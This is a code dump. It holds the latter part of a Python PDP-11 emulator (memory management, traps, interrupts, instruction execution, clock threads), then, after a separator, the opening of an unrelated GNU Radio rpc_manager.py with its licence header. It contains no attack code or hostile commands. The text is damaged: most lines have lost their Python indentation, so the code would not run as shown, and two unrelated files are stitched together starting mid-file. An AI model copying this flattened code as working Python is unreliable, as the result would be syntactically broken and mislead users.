raise(Trap(INT.BUS, 'read from invalid address ' + ostr(addr,6)))
def physread8(self, addr):
val = self.physread16(addr & ~1)
if addr & 1:
return val >> 8
return val & 0xFF
def physwrite8(self, a, v):
if a < 0o760000:
if a & 1:
self.memory[a>>1] &= 0xFF
self.memory[a>>1] |= (v & 0xFF) << 8
else:
self.memory[a>>1] &= 0xFF00
self.memory[a>>1] |= v & 0xFF
else:
if a & 1:
self.physwrite16(a&~1, (self.physread16(a) & 0xFF) | ((v & 0xFF) << 8))
else:
self.physwrite16(a&~1, (self.physread16(a) & 0xFF00) | (v & 0xFF))
def physwrite16(self, a, v):
        if a & 1:
raise(Trap(INT.BUS, "write to odd address " + ostr(a,6)))
if a < 0o760000:
try:
self.memory[a>>1] = v
except OverflowError as e: # dirty fix of a problem
if v < 0:
#self.writedebug("warning: negative value @ physwrite16\n") # TODO: clean it up so that it doesn happen
self.memory[a>>1] = v & 0xFFFF
elif v > 0xFFFF:
#self.writedebug("warning: short overflow @ physwrite16\n") # TODO: clean it up so that it doesn happen
self.memory[a>>1] = v & 0xFFFF
else:
raise e
elif a == 0o777776:
bits = (v >> 14) & 3
if bits == 0:
self.switchmode(False)
elif bits == 3:
self.switchmode(True)
else:
self.panic("invalid mode")
bits = (v >> 12) & 3
if bits == 0:
self.prevuser = False
elif bits == 3:
self.prevuser = True
else:
self.panic("invalid mode")
self.PS = v
elif a == 0o777546:
self.LKS = v
elif a == 0o777572:
self.SR0 = v
elif (a & 0o777770) == 0o777560:
self.terminal.conswrite16(a, v)
elif (a & 0o777700) == 0o777400:
self.rk.write16(a,v)
elif (a & 0o777600) == 0o772200 or (a & 0o777600) == 0o777600:
self.mmuwrite16(a,v)
else:
raise(Trap(INT.BUS, "write to invalid address " + ostr(a,6)))
def decode(self, a, w, m):
#var p, user, block, disp
if not (self.SR0 & 1):
if a >= 0o170000:
a += 0o600000
return a
user = 8 if m else 0
p = self.pages[(a >> 13) + user]
if w and not p.write:
self.SR0 = (1<<13) | 1
self.SR0 |= (a >> 12) & ~1
if user:
self.SR0 |= (1<<5) | (1<<6)
self.SR2 = self.curPC
raise(Trap(INT.FAULT, "write to read-only page " + ostr(a,6)))
if not p.read:
self.SR0 = (1<<15) | 1
self.SR0 |= (a >> 12) & ~1
if user:
self.SR0 |= (1<<5)|(1<<6)
self.SR2 = self.curPC
raise(Trap(INT.FAULT, "read from no-access page " + ostr(a,6)))
block = (a >> 6) & 0o177
disp = a & 0o77
if (p.ed and (block < p.len)) or (not p.ed and (block > p.len)):
self.SR0 = (1<<14) | 1
self.SR0 |= (a >> 12) & ~1
if user:
self.SR0 |= (1<<5)|(1<<6)
self.SR2 = self.curPC
raise(Trap(INT.FAULT, "page length exceeded, address " + ostr(a,6) + " (block " + \
ostr(block,3) + ") is beyond length " + ostr(p.len,3)))
if w:
p.pdr |= 1<<6
return ((block + p.addr) << 6) + disp
def mmuread16(self, a):
i = (a & 0o17)>>1
if (a >= 0o772300) and (a < 0o772320):
return self.pages[i].pdr
if (a >= 0o772340) and (a < 0o772360):
return self.pages[i].par
if (a >= 0o777600) and (a < 0o777620):
return self.pages[i+8].pdr
if (a >= 0o777640) and (a < 0o777660):
return self.pages[i+8].par
raise(Trap(INT.BUS, "invalid read from " + ostr(a,6)))
def mmuwrite16(self, a, v):
i = (a & 0o17)>>1
if (a >= 0o772300) and (a < 0o772320):
self.pages[i] = Page(self.pages[i].par, v)
elif (a >= 0o772340) and (a < 0o772360):
self.pages[i] = Page(v, self.pages[i].pdr)
elif (a >= 0o777600) and (a < 0o777620):
self.pages[i+8] = Page(self.pages[i+8].par, v)
elif (a >= 0o777640) and (a < 0o777660):
self.pages[i+8] = Page(v, self.pages[i+8].pdr)
else:
raise(Trap(INT.BUS, "write to invalid address " + ostr(a,6)))
def read8(self, a):
return self.physread8(self.decode(a, False, self.curuser))
def read16(self, a):
return self.physread16(self.decode(a, False, self.curuser))
def write8(self, a, v):
return self.physwrite8(self.decode(a, True, self.curuser), v)
def write16(self, a, v):
return self.physwrite16(self.decode(a, True, self.curuser), v)
def fetch16(self):
val = self.read16(self.R[7])
self.R[7] += 2
return val
def push(self, v):
self.R[6] -= 2
self.write16(self.R[6], v)
def pop(self):
val = self.read16(self.R[6])
self.R[6] += 2
return val
def disasmaddr(self, m, a):
if (m & 7) == 7:
if m == 0o27:
a[0] += 2
return "$" + oct(self.memory[a[0]>>1])[2:]
elif m == 0o37:
a[0] += 2
return "*" + oct(self.memory[a[0]>>1])[2:]
elif m == 0o67:
a[0] += 2
return "*" + oct((a[0] + 2 + self.memory[a[0]>>1]) & 0xFFFF)[2:]
elif m == 0o77:
a[0] += 2
return "**" + oct((a[0] + 2 + self.memory[a[0]>>1]) & 0xFFFF)[2:]
r = PDP11.RS[m & 7]
bits = m & 0o70
if bits == 0o00:
return r
elif bits == 0o10:
return "(" + r + ")"
elif bits == 0o20:
return "(" + r + ")+"
elif bits == 0o30:
return "*(" + r + ")+"
elif bits == 0o40:
return "-(" + r + ")"
elif bits == 0o50:
return "*-(" + r + ")"
elif bits == 0o60:
a[0]+=2
return oct(self.memory[a[0]>>1])[2:] + "(" + r + ")"
elif bits == 0o70:
a[0]+=2
return "*" + oct(self.memory[a[0]>>1])[2:] + "(" + r + ")"
def disasm(self, a):
#var i, ins, l, msg, s, d;
ins = self.memory[a>>1] # instruction
msg = None
for l in DISASM_TABLE:
if (ins & l[0]) == l[1]:
msg = l[2]
break
if not msg:
return "???"
if l[4] and ins & 0o100000:
msg += "B"
s = (ins & 0o7700) >> 6
d = ins & 0o77
o = ins & 0o377
aa = [a]
if l[3] == "SD" or l[3] == "D":
if l[3] == "SD":
msg += " " + self.disasmaddr(s, aa) + ","
msg += " " + self.disasmaddr(d, aa)
elif l[3] == "D":
msg += " " + self.disasmaddr(d, aa)
elif l[3] == "RO" or l[3] == "O":
if l[3] == "RO":
msg += " " + PDP11.RS[(ins & 0o700) >> 6] + ","; o &= 0o77
if o & 0x80:
msg += " -" + oct(2*((0xFF ^ o) + 1))[2:]
else:
msg += " +" + oct(2*o)[2:]
elif l[3] == "RD":
msg += " " + PDP11.RS[(ins & 0o700) >> 6] + ", " + self.disasmaddr(d, aa)
elif l[3] == "R":
msg += " " + PDP11.RS[ins & 7]
elif l[3] == "R3":
msg += " " + PDP11.RS[(ins & 0o700) >> 6]
return msg
def cleardebug(self):
self.terminal.cleardebug()
def writedebug(self, msg):
self.terminal.writedebug(msg)
def printstate(self):
# Display registers
self.writedebug(str(self.step_cnt)+'\n')
self.writedebug(
"R0 " + ostr(self.R[0]) + " " + \
"R1 " + ostr(self.R[1]) + " " + \
"R2 " + ostr(self.R[2]) + " " + \
"R3 " + ostr(self.R[3]) + " " + \
"R4 " + ostr(self.R[4]) + " " + \
"R5 " + ostr(self.R[5]) + " " + \
"R6 " + ostr(self.R[6]) + " " + \
"R7 " + ostr(self.R[7]) + "\n"
)
self.writedebug( "[" + \
("u" if self.prevuser else "k") + \
("U" if self.curuser else "K") + \
("N" if (self.PS & PDP11.FLAGN) else " ") + \
("Z" if (self.PS & PDP11.FLAGZ) else " ") + \
("V" if (self.PS & PDP11.FLAGV) else " ") + \
("C" if (self.PS & PDP11.FLAGC) else " ") + \
"] instr " + ostr(self.curPC) + ": " + ostr(self.instr) + " "
)
try:
decoded = self.decode(self.curPC, False, self.curuser)
self.writedebug(self.disasm(decoded) + "\n")
except Exception:
pass
def panic(self, msg):
self.writedebug('PANIC: ' + msg + '\n')
self.printstate()
self.stop_cpu()
raise Exception(msg)
def interrupt(self, vec, pri):
# This is called by CPU, GUI and clock threads
if vec & 1:
self.panic("Thou darst calling interrupt() with an odd vector number?")
self.interrupts.put(Interrupt(vec, pri))
if vec == INT.CLOCK:
self.clock_running = True
self.running.set()
def clock(self):
'''Clock thread'''
self.clock_cnt = 0
self.last_time = time.time()
while not self.clock_stop.is_set():
time.sleep(0.05) # PDP-11 clock runs at 50 or 60 Hz; intentionally running it at 20 Hz to reduce CPU usage
# time will run slower inside the emulation
# Clock interrupt
self.LKS |= 0x80 # bit 7: set to 1 every 20 ms
if self.LKS & 0x40: # bit 6: when set, an interrupt will occur
self.interrupt(INT.CLOCK, 6)
# Calculate iterations per seconds and pass to GUI thread
self.clock_cnt += 1
if self.clock_cnt & 0xF == 0:
now = time.time()
self.terminal.ips = int(self.iter_cnt/(now - self.last_time))
self.last_time = now
self.iter_cnt = 0
print('- clock stopped')
def handleinterrupt(self, vec):
# PyPDP11 interrupts
if vec & 0o400:
if vec == INT.LoadImage:
self.load_image()
return
elif vec == INT.ExtractImage:
self.extract_image()
return
elif vec == INT.Synchronize:
self.sync()
return
elif vec == INT.Reset:
self.reset()
return
# PDP-11 interrupts
try:
prev = self.PS
self.switchmode(False)
self.push(prev)
self.push(self.R[7])
except Trap as e:
self.trapat(e.num, str(e))
self.R[7] = self.memory[vec>>1]
self.PS = self.memory[(vec>>1)+1]
if self.prevuser:
self.PS |= (1<<13) | (1<<12)
def trapat(self, vec, msg):
#var prev;
if vec & 1:
self.panic("Thou darst calling trapat() with an odd vector number?")
self.writedebug("trap " + ostr(vec) + " occurred: " + msg + "\n")
self.printstate()
try:
prev = self.PS
self.switchmode(False)
self.push(prev)
self.push(self.R[7])
except Exception as e:
            if hasattr(e, 'num'):
self.writedebug("red stack trap!\n")
self.memory[0] = self.R[7]
self.memory[1] = prev
vec = 4
else:
raise(e)
self.R[7] = self.memory[vec>>1]
self.PS = self.memory[(vec>>1)+1]
if self.prevuser:
self.PS |= (1<<13) | (1<<12)
self.running.set()
def aget(self, v, l):
#var addr
if (v & 7) >= 6 or (v & 0o10):
l = 2
if (v & 0o70) == 0o00:
return -(v + 1)
bits = v & 0o60
if bits == 0o00:
v &= 7
addr = self.R[v & 7]
elif bits == 0o20:
addr = self.R[v & 7]
self.R[v & 7] += l
elif bits == 0o40:
self.R[v & 7] -= l
addr = self.R[v & 7]
elif bits == 0o60:
addr = self.fetch16()
addr += self.R[v & 7]
addr &= 0xFFFF
if v & 0o10:
addr = self.read16(addr)
return addr
def memread(self, a, l):
if a < 0:
if l == 2:
return self.R[-(a + 1)]
else:
return self.R[-(a + 1)] & 0xFF
if l == 2:
return self.read16(a)
return self.read8(a)
def memwrite(self, a, l, v):
if a < 0:
if l == 2:
self.R[-(a + 1)] = v
else:
self.R[-(a + 1)] &= 0xFF00
self.R[-(a + 1)] |= v
elif l == 2:
self.write16(a, v)
else:
self.write8(a, v)
def branch(self, o):
if o & 0x80:
o = -(((~o)+1)&0xFF)
o <<= 1
self.R[7] += o
def extract_image(self):
# Called on PyPDP11 interrupt
self.rk.save_image(EXTRACTED_IMAGE_FILENAME)
self.writedebug('Disk image saved to: {}\n'.format(EXTRACTED_IMAGE_FILENAME))
def load_image(self):
# Called on PyPDP11 interrupt
self.rk.load_image(EXTRACTED_IMAGE_FILENAME)
self.writedebug('Disk image loaded from file: {}\n'.format(EXTRACTED_IMAGE_FILENAME))
def sync(self):
# Called on PyPDP11 interrupt
unix_dir, local_dir = self.unix_dir, self.local_dir
print('Syncing:', unix_dir, local_dir)
try:
self.rk.start_sync_thread(unix_dir, local_dir)
except Exception as e:
self.writedebug('FAILED TO SYNC: '+str(e)+'\n')
def step(self):
#var val, val1, val2, ia, da, sa, d, s, l, r, o, max, maxp, msb;
self.iter_cnt += 1
self.step_cnt += 1
self.curPC = self.R[7]
ia = self.decode(self.R[7], False, self.curuser) # instruction address
self.R[7] += 2
self.instr = self.physread16(ia)
d = self.instr & 0o77
s = (self.instr & 0o7700) >> 6
l = 2 - (self.instr >> 15)
o = self.instr & 0xFF
if l == 2:
max = 0xFFFF
maxp = 0x7FFF
msb = 0x8000
else:
max = 0xFF
maxp = 0x7F
msb = 0x80
# MOV / CMP / BIT / BIC / BIS
bits = self.instr & 0o070000
if bits == 0o010000: # MOV
sa = self.aget(s, l); val = self.memread(sa, l)
da = self.aget(d, l)
self.PS &= 0xFFF1
if val & msb:
self.PS |= PDP11.FLAGN
if val == 0:
self.PS |= PDP11.FLAGZ
if da < 0 and l == 1:
l = 2
if val & msb:
val |= 0xFF00
self.memwrite(da, l, val)
return
elif bits == 0o020000: # CMP
sa = self.aget(s, l); val1 = self.memread(sa, l)
da = self.aget(d, l); val2 = self.memread(da, l)
val = (val1 - val2) & max
self.PS &= 0xFFF0
if val == 0:
self.PS |= PDP11.FLAGZ
if val & msb:
self.PS |= PDP11.FLAGN
if ((val1 ^ val2) & msb) and not ((val2 ^ val) & msb):
self.PS |= PDP11.FLAGV
if val1 < val2:
self.PS |= PDP11.FLAGC
return
elif bits == 0o030000: # BIT
sa = self.aget(s, l); val1 = self.memread(sa, l)
da = self.aget(d, l); val2 = self.memread(da, l)
val = val1 & val2
self.PS &= 0xFFF1
if val == 0:
self.PS |= PDP11.FLAGZ
if val & msb:
self.PS |= PDP11.FLAGN
return
elif bits == 0o040000: # BIC
sa = self.aget(s, l); val1 = self.memread(sa, l)
da = self.aget(d, l); val2 = self.memread(da, l)
val = (max ^ val1) & val2
self.PS &= 0xFFF1
if val == 0:
self.PS |= PDP11.FLAGZ
if val & msb:
self.PS |= PDP11.FLAGN
self.memwrite(da, l, val)
return
elif bits == 0o050000: # BIS
sa = self.aget(s, l); val1 = self.memread(sa, l)
da = self.aget(d, l); val2 = self.memread(da, l)
val = val1 | val2
self.PS &= 0xFFF1
if val == 0:
self.PS |= PDP11.FLAGZ
if val & msb:
self.PS |= PDP11.FLAGN
self.memwrite(da, l, val)
return
# ADD / SUB
bits = self.instr & 0o170000
if bits == 0o060000: # ADD
sa = self.aget(s, 2); val1 = self.memread(sa, 2)
da = self.aget(d, 2); val2 = self.memread(da, 2)
val = (val1 + val2) & 0xFFFF
self.PS &= 0xFFF0
if val == 0:
self.PS |= PDP11.FLAGZ
if val & 0x8000:
self.PS |= PDP11.FLAGN
if not ((val1 ^ val2) & 0x8000) and ((val2 ^ val) & 0x8000):
self.PS |= PDP11.FLAGV
if val1 + val2 >= 0xFFFF:
self.PS |= PDP11.FLAGC
self.memwrite(da, 2, val)
return
elif bits == 0o160000: # SUB
sa = self.aget(s, 2); val1 = self.memread(sa, 2)
da = self.aget(d, 2); val2 = self.memread(da, 2)
val = (val2 - val1) & 0xFFFF
self.PS &= 0xFFF0
if val == 0:
self.PS |= PDP11.FLAGZ
if val & 0x8000:
self.PS |= PDP11.FLAGN
if ((val1 ^ val2) & 0x8000) and not ((val2 ^ val) & 0x8000):
self.PS |= PDP11.FLAGV
if val1 > val2:
self.PS |= PDP11.FLAGC
self.memwrite(da, 2, val)
return
# JSR / MUL / DIV / ASH / ASHC / XOR / SOB
bits = self.instr & 0o177000
if bits == 0o004000: # JSR
val = self.aget(d, l)
if val >= 0:
self.push(self.R[s & 7])
self.R[s & 7] = self.R[7]
self.R[7] = val
return
elif bits == 0o070000: # MUL
val1 = self.R[s & 7]
if val1 & 0x8000:
val1 = -((0xFFFF^val1)+1)
da = self.aget(d, l); val2 = self.memread(da, 2)
if val2 & 0x8000:
val2 = -((0xFFFF^val2)+1)
val = val1 * val2
self.R[s & 7] = (val & 0xFFFF0000) >> 16
self.R[(s & 7)|1] = val & 0xFFFF
self.PS &= 0xFFF0
if val & 0x80000000:
self.PS |= PDP11.FLAGN
if (val & 0xFFFFFFFF) == 0:
self.PS |= PDP11.FLAGZ
if val < (1<<15) or val >= ((1<<15)-1):
self.PS |= PDP11.FLAGC
return
elif bits == 0o071000: # DIV
val1 = (self.R[s & 7] << 16) | self.R[(s & 7) | 1]
da = self.aget(d, l); val2 = self.memread(da, 2)
self.PS &= 0xFFF0
if val2 == 0:
self.PS |= PDP11.FLAGC
return
if (val1 / val2) >= 0x10000:
self.PS |= PDP11.FLAGV
return
self.R[s & 7] = (val1 // val2) & 0xFFFF
self.R[(s & 7) | 1] = (val1 % val2) & 0xFFFF
if self.R[s & 7] == 0:
self.PS |= PDP11.FLAGZ
if self.R[s & 7] & 0o100000:
self.PS |= PDP11.FLAGN
if val1 == 0:
self.PS |= PDP11.FLAGV
return
elif bits == 0o072000: # ASH
val1 = self.R[s & 7]
da = self.aget(d, 2); val2 = self.memread(da, 2) & 0o77
self.PS &= 0xFFF0
if val2 & 0o40:
val2 = (0o77 ^ val2) + 1
if val1 & 0o100000:
val = 0xFFFF ^ (0xFFFF >> val2)
val |= val1 >> val2
else:
val = val1 >> val2
if val1 & (1 << (val2 - 1)):
self.PS |= PDP11.FLAGC
else:
val = (val1 << val2) & 0xFFFF
if val1 & (1 << (16 - val2)):
self.PS |= PDP11.FLAGC
self.R[s & 7] = val
if val == 0:
self.PS |= PDP11.FLAGZ
if val & 0o100000:
self.PS |= PDP11.FLAGN
if self._xor(val & 0o100000, val1 & 0o100000):
self.PS |= PDP11.FLAGV
return
elif bits == 0o073000: # ASHC
val1 = (self.R[s & 7] << 16) | self.R[(s & 7) | 1]
da = self.aget(d, 2); val2 = self.memread(da, 2) & 0o77
self.PS &= 0xFFF0
if val2 & 0o40:
val2 = (0o77 ^ val2) + 1
if val1 & 0x80000000:
val = 0xFFFFFFFF ^ (0xFFFFFFFF >> val2)
val |= val1 >> val2
else:
val = val1 >> val2
if val1 & (1 << (val2 - 1)):
self.PS |= PDP11.FLAGC
else:
val = (val1 << val2) & 0xFFFFFFFF
if val1 & (1 << (32 - val2)):
self.PS |= PDP11.FLAGC
self.R[s & 7] = (val >> 16) & 0xFFFF
self.R[(s & 7)|1] = val & 0xFFFF
if val == 0:
self.PS |= PDP11.FLAGZ
if val & 0x80000000:
self.PS |= PDP11.FLAGN
if self._xor(val & 0x80000000, val1 & 0x80000000):
self.PS |= PDP11.FLAGV
return
elif bits == 0o074000: # XOR
val1 = self.R[s & 7]
da = self.aget(d, 2); val2 = self.memread(da, 2)
val = val1 ^ val2
self.PS &= 0xFFF1
if val == 0:
self.PS |= PDP11.FLAGZ
if val & 0x8000:
                self.PS |= PDP11.FLAGN
self.memwrite(da, 2, val)
return
elif bits == 0o077000: # SOB
self.R[s & 7] -= 1
if self.R[s & 7]:
o &= 0o77
o <<= 1
self.R[7] -= o
return
# CLR / COM / INC / DEC / NEG / ADC / SBC / TST / ROL / ROR / ASL / AST / SXT
bits = self.instr & 0o077700
if bits == 0o005000: # CLR
self.PS &= 0xFFF0
self.PS |= PDP11.FLAGZ
da = self.aget(d, l)
self.memwrite(da, l, 0)
return
elif bits == 0o005100: # COM
da = self.aget(d, l)
val = self.memread(da, l) ^ max
self.PS &= 0xFFF0; self.PS |= PDP11.FLAGC
if val & msb:
self.PS |= PDP11.FLAGN
if val == 0:
self.PS |= PDP11.FLAGZ
self.memwrite(da, l, val)
return
elif bits == 0o005200: # INC
da = self.aget(d, l)
val = (self.memread(da, l) + 1) & max
self.PS &= 0xFFF1
if val & msb:
self.PS |= PDP11.FLAGN | PDP11.FLAGV
if val == 0:
self.PS |= PDP11.FLAGZ
self.memwrite(da, l, val)
return
elif bits == 0o005300: # DEC
da = self.aget(d, l)
val = (self.memread(da, l) - 1) & max
self.PS &= 0xFFF1
if val & msb:
self.PS |= PDP11.FLAGN
if val == maxp:
self.PS |= PDP11.FLAGV
if val == 0:
self.PS |= PDP11.FLAGZ
self.memwrite(da, l, val)
return
elif bits == 0o005400: # NEG
da = self.aget(d, l)
val = (-self.memread(da, l)) & max
self.PS &= 0xFFF0
if val & msb:
self.PS |= PDP11.FLAGN
if val == 0:
self.PS |= PDP11.FLAGZ
else:
self.PS |= PDP11.FLAGC
if val == 0x8000:
self.PS |= PDP11.FLAGV
self.memwrite(da, l, val)
return
elif bits == 0o005500: # ADC
da = self.aget(d, l)
val = self.memread(da, l)
if self.PS & PDP11.FLAGC:
self.PS &= 0xFFF0
if (val + 1) & msb:
self.PS |= PDP11.FLAGN
if val == max:
self.PS |= PDP11.FLAGZ
if val == 0o077777:
self.PS |= PDP11.FLAGV
if val == 0o177777:
self.PS |= PDP11.FLAGC
self.memwrite(da, l, (val+1) & max)
else:
self.PS &= 0xFFF0
if val & msb:
self.PS |= PDP11.FLAGN
if val == 0:
self.PS |= PDP11.FLAGZ
return
elif bits == 0o005600: # SBC
da = self.aget(d, l)
val = self.memread(da, l)
if self.PS & PDP11.FLAGC:
self.PS &= 0xFFF0
if (val - 1) & msb:
self.PS |= PDP11.FLAGN
if val == 1:
self.PS |= PDP11.FLAGZ
if val:
self.PS |= PDP11.FLAGC
if val == 0o100000:
self.PS |= PDP11.FLAGV
self.memwrite(da, l, (val-1) & max)
else:
self.PS &= 0xFFF0
if val & msb:
self.PS |= PDP11.FLAGN
if val == 0:
self.PS |= PDP11.FLAGZ
if val == 0o100000:
self.PS |= PDP11.FLAGV
self.PS |= PDP11.FLAGC
return
elif bits == 0o005700: # TST
da = self.aget(d, l)
val = self.memread(da, l)
self.PS &= 0xFFF0
if val & msb:
self.PS |= PDP11.FLAGN
if val == 0:
self.PS |= PDP11.FLAGZ
return
elif bits == 0o006000: # ROR
da = self.aget(d, l)
val = self.memread(da, l)
if self.PS & PDP11.FLAGC:
val |= max+1
self.PS &= 0xFFF0
if val & 1:
self.PS |= PDP11.FLAGC
if val & (max+1):
self.PS |= PDP11.FLAGN
if not (val & max):
self.PS |= PDP11.FLAGZ
if self._xor(val & 1, val & (max+1)):
self.PS |= PDP11.FLAGV
val >>= 1
self.memwrite(da, l, val)
return
elif bits == 0o006100: # ROL
da = self.aget(d, l)
val = self.memread(da, l) << 1
if self.PS & PDP11.FLAGC:
val |= 1
self.PS &= 0xFFF0
if val & (max+1):
self.PS |= PDP11.FLAGC
if val & msb:
self.PS |= PDP11.FLAGN
if not (val & max):
self.PS |= PDP11.FLAGZ
if (val ^ (val >> 1)) & msb:
self.PS |= PDP11.FLAGV
val &= max
self.memwrite(da, l, val)
return
elif bits == 0o006200: # ASR
da = self.aget(d, l)
val = self.memread(da, l)
self.PS &= 0xFFF0
if val & 1:
self.PS |= PDP11.FLAGC
if val & msb:
self.PS |= PDP11.FLAGN
if self._xor(val & msb, val & 1):
self.PS |= PDP11.FLAGV
val = (val & msb) | (val >> 1)
if val == 0:
self.PS |= PDP11.FLAGZ
self.memwrite(da, l, val)
return
elif bits == 0o006300: # ASL
da = self.aget(d, l)
val = self.memread(da, l)
self.PS &= 0xFFF0
if val & msb:
self.PS |= PDP11.FLAGC
if val & (msb >> 1):
self.PS |= PDP11.FLAGN
if (val ^ (val << 1)) & msb:
self.PS |= PDP11.FLAGV
val = (val << 1) & max
if val == 0:
self.PS |= PDP11.FLAGZ
self.memwrite(da, l, val)
return
elif bits == 0o006700: # SXT
da = self.aget(d, l)
if self.PS & PDP11.FLAGN:
self.memwrite(da, l, max)
else:
self.PS |= PDP11.FLAGZ
self.memwrite(da, l, 0)
return
# JMP / SWAB / MARK / MFPI / MTPI
bits = self.instr & 0o177700
if bits == 0o000100: # JMP
val = self.aget(d, 2)
if val >= 0:
self.R[7] = val
return
elif bits == 0o000300: # SWAB
da = self.aget(d, l)
val = self.memread(da, l)
val = ((val >> 8) | (val << 8)) & 0xFFFF
self.PS &= 0xFFF0
if (val & 0xFF) == 0:
self.PS |= PDP11.FLAGZ
if val & 0x80:
self.PS |= PDP11.FLAGN
self.memwrite(da, l, val)
return
        elif bits == 0o006400: # MARK
            self.R[6] = self.R[7] + ((self.instr & 0o77) << 1)
            self.R[7] = self.R[5]
            self.R[5] = self.pop()
            return
elif bits == 0o006500: # MFPI
da = self.aget(d, 2)
if da == -7:
val = self.R[6] if (self.curuser == self.prevuser) else (self.USP if self.prevuser else self.KSP)
elif da < 0:
self.panic("invalid MFPI instruction")
else:
val = self.physread16(self.decode(da, False, self.prevuser))
self.push(val)
self.PS &= 0xFFF0; self.PS |= PDP11.FLAGC
if val == 0:
self.PS |= PDP11.FLAGZ
if val & 0x8000:
self.PS |= PDP11.FLAGN
return
elif bits == 0o006600: # MTPI
da = self.aget(d, 2)
val = self.pop()
if da == -7:
if self.curuser == self.prevuser:
self.R[6] = val
elif self.prevuser:
self.USP = val
else:
self.KSP = val
elif da < 0:
self.panic("invalid MTPI instrution")
else:
sa = self.decode(da, True, self.prevuser)
self.physwrite16(sa, val)
self.PS &= 0xFFF0; self.PS |= PDP11.FLAGC
if val == 0:
self.PS |= PDP11.FLAGZ
if val & 0x8000:
self.PS |= PDP11.FLAGN
return
# RTS
if (self.instr & 0o177770) == 0o000200:
self.R[7] = self.R[d & 7]
self.R[d & 7] = self.pop()
return
        # Conditional branches: BR, BNE, BEQ, BGE, BLT, BGT, BLE, BPL, BMI, BHI, BLOS, BVC, BVS, BCC, BCS
bits = self.instr & 0o177400
if bits == 0o000400:
self.branch(o)
return
elif bits == 0o001000:
if not (self.PS & PDP11.FLAGZ):
self.branch(o)
return
elif bits == 0o001400:
if self.PS & PDP11.FLAGZ:
self.branch(o)
return
elif bits == 0o002000:
if not self._xor(self.PS & PDP11.FLAGN, self.PS & PDP11.FLAGV):
self.branch(o)
return
elif bits == 0o002400:
if self._xor(self.PS & PDP11.FLAGN, self.PS & PDP11.FLAGV):
self.branch(o)
return
elif bits == 0o003000:
if not self._xor(self.PS & PDP11.FLAGN, self.PS & PDP11.FLAGV) and not (self.PS & PDP11.FLAGZ):
self.branch(o)
return
elif bits == 0o003400:
if self._xor(self.PS & PDP11.FLAGN, self.PS & PDP11.FLAGV) or (self.PS & PDP11.FLAGZ):
self.branch(o)
return
elif bits == 0o100000:
if not (self.PS & PDP11.FLAGN):
self.branch(o)
return
elif bits == 0o100400:
if self.PS & PDP11.FLAGN:
self.branch(o)
return
elif bits == 0o101000:
if not (self.PS & PDP11.FLAGC) and not (self.PS & PDP11.FLAGZ):
self.branch(o)
return
elif bits == 0o101400:
if (self.PS & PDP11.FLAGC) or (self.PS & PDP11.FLAGZ):
self.branch(o)
return
elif bits == 0o102000:
if not (self.PS & PDP11.FLAGV):
self.branch(o)
return
elif bits == 0o102400:
if self.PS & PDP11.FLAGV:
self.branch(o)
return
elif bits == 0o103000:
if not (self.PS & PDP11.FLAGC):
self.branch(o)
return
elif bits == 0o103400:
if self.PS & PDP11.FLAGC:
self.branch(o)
return
# EMT TRAP IOT BPT
if (self.instr & 0o177000) == 0o104000 or self.instr == 3 or self.instr == 4:
#var vec, prev;
if (self.instr & 0o177400) == 0o104000:
vec = 0o30
elif (self.instr & 0o177400) == 0o104400:
vec = 0o34
elif self.instr == 3:
vec = 0o14
else:
vec = 0o20
prev = self.PS
self.switchmode(False)
self.push(prev)
self.push(self.R[7])
self.R[7] = self.memory[vec>>1]
self.PS = self.memory[(vec>>1)+1]
if self.prevuser:
self.PS |= (1<<13) | (1<<12)
return
# CL?, SE?
if (self.instr & 0o177740) == 0o240:
if self.instr & 0o20:
self.PS |= self.instr & 0o17
else:
self.PS &= ~(self.instr & 0o17)
return
# HALT / WAIT / RTI / RTT / RESET / SETD
bits = self.instr
if bits == 0o000000: # HALT
if not self.curuser:
self.writedebug("HALT\n")
self.printstate()
self.stop_cpu()
return
elif bits == 0o000001: # WAIT
#time.sleep(0.001)
if not self.curuser:
self.running.clear()
return
elif bits == 0o000002 or bits == 0o000006: # RTI / RTT
self.R[7] = self.pop()
val = self.pop()
if self.curuser:
val &= 0o47
val |= self.PS & 0o177730
self.physwrite16(0o777776, val)
return
elif bits == 0o000005: # RESET
if self.curuser:
return
self.terminal.clear()
self.rk.reset()
return
elif bits == 0o170011: # SETD ; not needed by UNIX, but used; therefore ignored
return
raise(Trap(INT.INVAL, "invalid instruction: " + self.disasm(ia)))
def run(self):
interrupted_from_wait = False
while not self.cpu_stop.is_set():
try:
self.step()
if not self.running.is_set() and self.clock_running:
self.running.wait()
interrupted_from_wait = True
# Handle interrupts
if (interrupted_from_wait or (self.step_cnt & 0xF) == 0) and not self.interrupts.empty():
priority_level = ((self.PS >> 5) & 7)
if self.last_interrupt_priority > priority_level:
inter = self.interrupts.get()
                        # compare with > rather than >=, following the PDP-11 interrupt priority description on Wikipedia
if inter.pri > priority_level:
self.handleinterrupt(inter.vec)
self.last_interrupt_priority = INT.MAX_PRIORITY
else:
# remember this "unprocessed" interrupt's priority for minor optimization
self.last_interrupt_priority = inter.pri
self.interrupts.put(inter)
interrupted_from_wait = False
except Trap as e:
self.trapat(e.num, str(e))
if self.prdebug:
self.printstate()
time.sleep(1)
print('- CPU stopped')
def start_cpu(self):
self.cpu_stop = threading.Event()
self.cpu_thread = threading.Thread(target=self.run)
self.cpu_thread.daemon = True
self.cpu_thread.start()
self.clock_stop = threading.Event()
self.clock_thread = threading.Thread(target=self.clock)
self.clock_thread.daemon = True
self.clock_thread.start()
def stop_cpu(self):
print('Stopping CPU...')
self.clock_stop.set()
print('Stopping clock...')
self.cpu_stop.set()
if __name__=='__main__':
pdp11 = PDP11()
pdp11.start_cpu()
pdp11.terminal.mainloop()
|
rpc_manager.py
|
#
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from __future__ import print_function
import zmq
import pmt
import threading
class rpc_manager():
def __init__(self):
self.zmq_context = zmq.Context()
self.poller_rep = zmq.Poller()
self.poller_req_out = zmq.Poller()
self.poller_req_in = zmq.Poller()
self.interfaces = dict()
    def __del__(self):
        # only stop the watcher thread if it was actually started
        if hasattr(self, "watcher_thread"):
            self.stop_watcher()
